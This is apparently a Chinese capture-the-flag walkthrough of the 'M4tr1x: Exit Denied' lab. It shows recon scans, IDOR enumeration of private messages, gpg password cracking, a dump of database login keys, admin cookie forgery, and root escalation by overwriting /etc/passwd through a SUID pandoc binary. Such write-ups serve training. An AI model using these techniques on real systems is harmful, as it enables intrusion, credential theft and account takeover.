M4tr1x: Exit Denied
端口扫描
root@ip-10-10-56-79:~/m4tr1xexitdenied# nmap -sTCV -p- --min-rate 1000 10.10.0.179
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-14 14:04 GMT
Nmap scan report for ip-10-10-0-179.eu-west-1.compute.internal (10.10.0.179)
Host is up (0.010s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:c1:d0:05:91:e1:c0:98:e1:41:f2:b3:21:d9:6b (RSA)
| 256 1e:ba:57:5f:29:8c:e4:7a:b4:e5:ac:ed:65:5d:8e:32 (ECDSA)
|_ 256 7b:55:2f:23:68:08:1a:eb:90:72:43:66:e1:44:a1:9d (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Linux-Bay
3306/tcp open mysql MySQL 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.47-MariaDB-0ubuntu0.18.04.1
| Thread ID: 109
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsCompression, FoundRows, LongPassword, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: R$\#948\G.N|K?:D(7}4
|_ Auth Plugin Name: 111
MAC Address: 02:A7:AB:43:02:B1 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 seconds
80
root@ip-10-10-123-172:~/m4tr1xexitdenied# gobuster dir -u http://10.10.157.153/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.157.153/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/11/18 01:25:56 Starting gobuster
===============================================================
/images (Status: 301)
/rss.php (Status: 302)
/archive (Status: 301)
/login (Status: 200)
/files (Status: 200)
/index.php (Status: 200)
/uploads (Status: 301)
/general (Status: 200)
/global.php (Status: 200)
/admin (Status: 301)
/misc.php (Status: 200)
/contact.php (Status: 200)
/stats.php (Status: 200)
/search.php (Status: 200)
/online.php (Status: 200)
/calendar.php (Status: 200)
/report.php (Status: 200)
/member.php (Status: 302)
/ftp (Status: 200)
/portal.php (Status: 200)
/showthread.php (Status: 200)
/memberlist.php (Status: 200)
/forumdisplay.php (Status: 200)
/css.php (Status: 200)
/install (Status: 301)
/announcements.php (Status: 200)
/polls.php (Status: 200)
/cache (Status: 301)
/blue (Status: 200)
/private.php (Status: 200)
/syndication.php (Status: 200)
/flag (Status: 200)
/inc (Status: 301)
/newreply.php (Status: 200)
/error (Status: 200)
/printthread.php (Status: 200)
/captcha.php (Status: 200)
/attachment (Status: 200)
/attachment.php (Status: 200)
/usercp.php (Status: 200)
/e-mail (Status: 200)
/newthread.php (Status: 200)
/secret (Status: 200)
/panel (Status: 200)
/administrator (Status: 200)
/task.php (Status: 200)
/warnings.php (Status: 200)
/reputation.php (Status: 200)
/htaccess.txt (Status: 200)
/jscripts (Status: 301)
/moderation.php (Status: 200)
/change_password (Status: 200)
/analyse (Status: 200)
/server-status (Status: 403)
/editpost.php (Status: 200)
===============================================================
2023/11/18 01:27:31 Finished
===============================================================
访问界面, 发现其对应的是一个论坛网站, 可以在其中注册用户, 于是我注册了一个用户, 在其中可以查看一些用户的帖子, 并且我发现一些漏洞:
- 通过查看个人主页, 并操作 id 选项, 可以查看其他用户的名称信息, 可以利用此来进行暴力破解
- 阅读帖子我收集到以下信息:
- jscale 用户要为其家庭设置 SSH
- bubbaBIGFOOT 说其邮箱存在大量垃圾邮件
- 一些特殊的用户 : ArnoldBagger、bigpaul、BlackCat
- 发现管理员的一个帖子 — 漏洞赏金计划 /bugbountyHQ , 此网页指向 /reportPanel.php , 从这里我知道了一些弱密码以及论坛漏洞情况
开始进行暴力破解, 获取到一些用户的账号
登陆 ArnoldBagger 用户的账号, 查看用户的邮件, 从中我知道了一些内容:
- 有一个插件存在漏洞, 并且开发出了新版本 v3 存在问题的版本是 v2 , 同时告诉我们需要进行测试 , 这个应该就是问题的关键点, 所以我们首先需要找到对应的插件存放位置
但是从页面的显示来看, 我们并没有获取到对应的插件信息, 在查看邮件信息时, 我发现其对应的 url 很有意思 http://10.10.178.193/private.php?action=read&pmid=39 这应该存在 IDOR 漏洞, 我们可以借此来进行枚举, 来查看一些可能被用户删除的邮件信息
root@ip-10-10-145-140:~/m4tr1xexitdenied# ffuf -w ./numbers.txt:FUZZ -u 'http://10.10.178.193/private.php?action=read&pmid=FUZZ' -b "mybb[lastvisit]=1700283844; sid=9647324899039f13bfc44093719a9bec; _ga=GA1.1.1847425810.1700283845; _gid=GA1.1.625594847.1700283845; mybb[lastactive]=1700283858; loginattempts=1; mybbuser=11_OoTfmlJyJhdJiqHXucrvRueHvGhE6LnBi5ih27KLQBKfigQLud" -fs 9359
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1
________________________________________________
:: Method : GET
:: URL : http://10.10.178.193/private.php?action=read&pmid=FUZZ
:: Wordlist : FUZZ: ./numbers.txt
:: Header : Cookie: mybb[lastvisit]=1700283844; sid=9647324899039f13bfc44093719a9bec; _ga=GA1.1.1847425810.1700283845; _gid=GA1.1.625594847.1700283845; mybb[lastactive]=1700283858; loginattempts=1; mybbuser=11_OoTfmlJyJhdJiqHXucrvRueHvGhE6LnBi5ih27KLQBKfigQLud
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 9359
________________________________________________
4 [Status: 200, Size: 21487, Words: 1270, Lines: 462]
40 [Status: 200, Size: 21945, Words: 1302, Lines: 468]
7 [Status: 200, Size: 22558, Words: 1418, Lines: 474]
5 [Status: 200, Size: 22088, Words: 1320, Lines: 474]
9 [Status: 200, Size: 22090, Words: 1328, Lines: 470]
22 [Status: 200, Size: 20930, Words: 1213, Lines: 462]
18 [Status: 200, Size: 21213, Words: 1267, Lines: 460]
19 [Status: 200, Size: 21989, Words: 1304, Lines: 476]
16 [Status: 200, Size: 21259, Words: 1279, Lines: 460]
14 [Status: 200, Size: 21014, Words: 1228, Lines: 460]
12 [Status: 200, Size: 21224, Words: 1249, Lines: 464]
34 [Status: 200, Size: 20901, Words: 1204, Lines: 460]
30 [Status: 200, Size: 20914, Words: 1205, Lines: 462]
31 [Status: 200, Size: 21836, Words: 1275, Lines: 474]
29 [Status: 200, Size: 20914, Words: 1205, Lines: 462]
28 [Status: 200, Size: 21875, Words: 1316, Lines: 466]
39 [Status: 200, Size: 21792, Words: 1312, Lines: 462]
查看发现的电子邮件我从中发现一个新的文件夹
访问新发现的文件夹
查看对应的 v2 版本的插件内容, 我们可以从中读取到插件的相关源代码, 我在这里选择其中主要的几条内容
$sql_p = file_get_contents('inc/tools/manage/SQL/p.txt'); //read SQL password from p.txt
$db = mysql_connect('localhost','mod',$sql_p);
从这里知道是从 p.txt 中读取对应的用户密码, 因此我们可以尝试破解此 gpg 文件, 但是没有效果, 查看提示信息, 其告诉我们 Page Source 接着查看网页源代码, 最终在漏洞列表中发现一些内容
对应的将其进行编码解析
Keymaker message:
apermutationofonlytheenglishletterswillopenthelocks
address: /0100101101100101011110010110110101100001011010110110010101110010
访问 /0100101101100101011110010110110101100001011010110110010101110010 页面, 发现存在这个页面
从其中我们可以获取到一个关键的字符串, 从其提示来看是几个小写字母也就是 ofqxvg
接着查看提示告诉我们 Itertools.Permutations() 在询问 GPT 后我知道了其作用, 因此借助此生成了一些密码, 之后开始解密我们的文件
import itertools
# 生成列表 [1, 2, 3] 的所有排列
perms = itertools.permutations(['f', 'v', 'g', 'o', 'x', 'q'])
# 打印所有排列
for perm in perms:
print(''.join(perm))
root@ip-10-10-145-140:~/m4tr1xexitdenied# gpg2john p.txt.gpg > hash.txt
root@ip-10-10-145-140:~/m4tr1xexitdenied# john hash.txt --wordlist=pass.txt
Warning: detected hash type "gpg", but the string is also recognized as "gpg-opencl"
Use the "--format=gpg-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fvgoxq (?)
1g 0:00:00:00 DONE (2023-11-18 05:26) 6.250g/s 12.50p/s 12.50c/s 12.50C/s fvgoxq
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
root@ip-10-10-145-140:~/m4tr1xexitdenied# gpg --decrypt p.txt.gpg
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
myS3CR3TPa55 //SQL Password
3306
接下来使用得到的账号和密码切换登陆我们的 mysql , 之后我们从中可以获取到结果用户的 login_key
root@ip-10-10-145-140:~/m4tr1xexitdenied# mysql -u mod -h 10.10.178.193 -p
mysql> SELECt * FROM members;
+----------------+-----------------------------------------------------+
| user | login_key |
+----------------+-----------------------------------------------------+
| LucyRob | xa72nhg3opUxviKUZWbMAwmyOekaJOFTGjiJjfAMhPkeIjk2Ig |
| Wannabe_Hacker | LsVBnPTZGeUw6JkmMKFrzkSIUPu5TC0Nej8DAjwYXenQcCFEpv |
| batmanZero | TBTZq6GfniPvFfb2A3rA2mQoThcb5U7irVF5lLpr0L4cJcy5m9 |
| SandraJannit | 6V5H71ZnvoW0FFbXx97YsV9LSnT4mltu9XB1v8qPo2X2CvfWBS |
| biggieballo | 75mXme5o0eY2o68sqeGBlTDvZcyJKmBhxUAusxiv6b816QilCG |
| AimsGregger | Xj8nuWt5Xn9UYzpIha1q2Fk4GUjyrEPPbpchDCwnniUO0ZzZyf |
| BlackCat | JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB |
| Golderg | clkNBtIoKICfzm6joGE2lTUiF2T8sVUfhtb2Aksst8zTRK2842 |
| TonyMontana | 8CtllQvd9V2qqHv0ZSjUj3PzuTSD37pam4ld8YjlB7gDN0zVwE |
| CaseBrax | eHXBFESqEoE5Ba2gcOjD8oBMJcgNRkazcJOc8wQQ9mGVRpMdvU |
| Ellie | G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT |
| Sosaxvector | RURFzCfyEIBeTE3yzgQDY34zC9jWqiBwSnyzDooH33fSiYr9ci |
| PalacerKing | 49wrogyJpIQI834MlhDnDnbb3Zlm0tFehnpz8ftDroesKNGbAX |
| Anderson | lkJVgYjuKl9P4cg8WUb8XYlLsWKT4Zxl5sT9rgL2a2d5pgPU1w |
| CrazyChris | tpM9k17itNHwqqT7b1qpX8dMq5TK83knrDrYe6KmxgiztsS1QN |
| StaceyLacer | QD8HpoWWrvP1I7kC4fvTaEEunlUz2ABgFUG5Huj8nqeInlz7df |
| ArnoldBagger | OoTfmlJyJhdJiqHXucrvRueHvGhE6LnBi5ih27KLQBKfigQLud |
| Carl_Dee | 3mPkPyBRwo67MOrJCOW8JDorQ8FvLpuCnreGowYrMYymVvDDXr |
| Xavier | ZBs4Co6qovOGI7H9FOI1qPhURDOagvBUgdXo8gphst8DhIyukP |
+----------------+-----------------------------------------------------+
19 rows in set (0.00 sec)
80
现在我们获取到了登陆的 key , 根据我们之前的筛选选择其中重要的几个用户, 发现只有 BlackCat 用户符合我们的目标, 因为其为管理员用户, 如果此时查看登陆的 cookie 就会发现一些特殊之处, 可以发现登陆的关键信息是 uid_login_key
所以我们可以伪造 BlackCat 用户进行登陆
登陆之后查看用户的�附件, 从中发现一些信息:
- 两个压缩文件, 其中存在一些信息
- 一个 SSH-TOTP pdf 文件 : 一种基于时间的单次密码验证机制,用于增强 SSH(Secure Shell)协议的安全性。它结合了两个关键元素:时间同步的时钟和基于哈希函数的单次密码生成算法。
从下载的压缩图片中, 可以收集到几个 key
从经过查找发现了一个已经写好的脚本, 可以利用此来完成对密码的猜测 (输入一些参数)
GitHub - GeardoRanger/M4tr1xBrute: M4tr1x: Exit Denied SSH-TOTP Brute Force Script
后渗透
architect
输入相关的参数, 执行程序就可以实现对密码的猜测
architect —> root
发现存在一个 SUID 程序 pandoc#suid
architect@matrixV99:~$ ls -al /usr/bin/pandoc
-rwsr-sr-x 1 FUCK root 80908912 Mar 8 2021 /usr/bin/pandoc
可以利用这个漏洞实现对文件的覆写, ��在这里我选择添加一个用户
architect@matrixV99:~$ echo -e 'FUCK:\$1\$admin\$eiO19kFjs48pgX5PoJpXm1:0:0::/root:/bin/bash\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nsshd:x:110:65534::/run/sshd:/usr/sbin/nologin\narchitect:x:1000:1000:architect:/home/architect:/bin/bash\nmysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false\nntp:x:112:115::/nonexistent:/usr/sbin/nologin' | /usr/bin/pandoc -t plain -o /etc/passwd
architect@matrixV99:~$ cat /etc/passwd
FUCK:$1$admin$eiO19kFjs48pgX5PoJpXm1:0:0::/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
......
architect@matrixV99:~$ su FUCK
Password:
FUCK@matrixV99:/home/architect# id
uid=0(FUCK) gid=0(root) groups=0(root)